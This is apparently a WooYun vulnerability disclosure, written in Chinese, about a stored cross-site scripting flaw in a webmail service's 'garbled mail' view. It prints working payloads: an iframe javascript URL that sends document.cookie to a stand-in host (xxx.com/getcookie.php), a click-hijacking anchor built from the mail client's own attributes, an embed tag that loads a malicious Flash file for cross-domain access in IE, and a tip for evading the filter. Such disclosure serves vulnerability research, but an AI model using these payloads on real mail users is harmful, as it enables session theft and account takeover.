WooYun.org

详细说明就说说这漏洞的偶然发现过程吧。
小白初学,如有错请多包涵,缘起想在乌云注册个ID,无奈要邀请码,上天眷顾,偶然降一小洞,先向一些前辈说声谢谢，都是向你们学的。现学现卖了。
一、要通过邮件进行攻击首先分析在哪里可以查看邮件.
如图1

1.在打开邮件时的界面
2.查看邮件原文(不过邮件内容是base64编码的,但包含了你用html方式写的邮件的原文,也就是未过滤过的)
3.邮件有乱码，也就是漏洞所在页面了
4.还有木有还没在意- -!
二、发现漏洞页面
在写邮件时,使用html方式写,我想很多人认为在邮件发送的时候被过滤了(其实原文还在,只是邮件显示的时候才被过滤掉的)。
如向对方发送

<iframe src="javascript:alert(/Hello World/);"></iframe>

当目标接收并打开邮件时,在点击"邮件有乱码"打开的页面时,神奇的弹窗出现了,说明src没被过滤掉。
三，漏洞触发场景
一般人是不会去点击"邮件有乱码"这连接的,但我们可以通过css的属性劫持持onclik实现。
我们随意在邮件里添加一张空间的图片(空间图片不会被屏蔽)或者一个连接,在图片或连接的属性里加上"邮件有乱码"这连接的属性，如

<a href="http://xxx.com/" ck="optMail2" opt="code" ></a>

当点击这个连接或者带有ck="optMail2" opt="code"属性的图片时，就相当于点击了"邮件有乱码",就会打开邮件有乱码这个页面。
四，漏洞利用
刚发现这洞时,觉得有点鸡肋,那接下来就让这鸡肋变成肌肉。
目标:获取cookie
iframe 在chrome下可以直接通过get的方式直接将cookie发给某个页面,如

<iframe src="javascript:img = new Image(); img.src = 'http://xxx.com/getcookie.php?'+document.cookie;"></iframe>

但在IE下iframe是禁止跨域的,怎么办呢？当然就是想到非标准的<embed>标签了。
我们用embed标签加入flash如下:

<EMBED type=application/x-shockwave-flash src=http://xxx.com/xss.swf allowscriptaccess="always">

结果在邮件显示界面,都会被狠狠的加上
(invokeurls="false" allownetworking="none" allowscriptaccess="never")这些属性,
百密一疏,但在点击"邮件有乱码"打开的页面依然没有被过滤掉,原来什么样，还是什么样
alway,alway here。
所以当我们点击"邮件有乱码"的连接时,显示的内容是从邮件原文取出并重新过滤的。
注意:实验时千万不要自做聪明的加一些 onerror什么的,会触发一些过滤机制吧,那样src也会被过滤掉。
这样就可以通过我们的恶意flash在IE浏览器下进行跨域操作了,通过flash获取cookie什么的就得通过想象力了,
关于flash的代码不在重点,略过。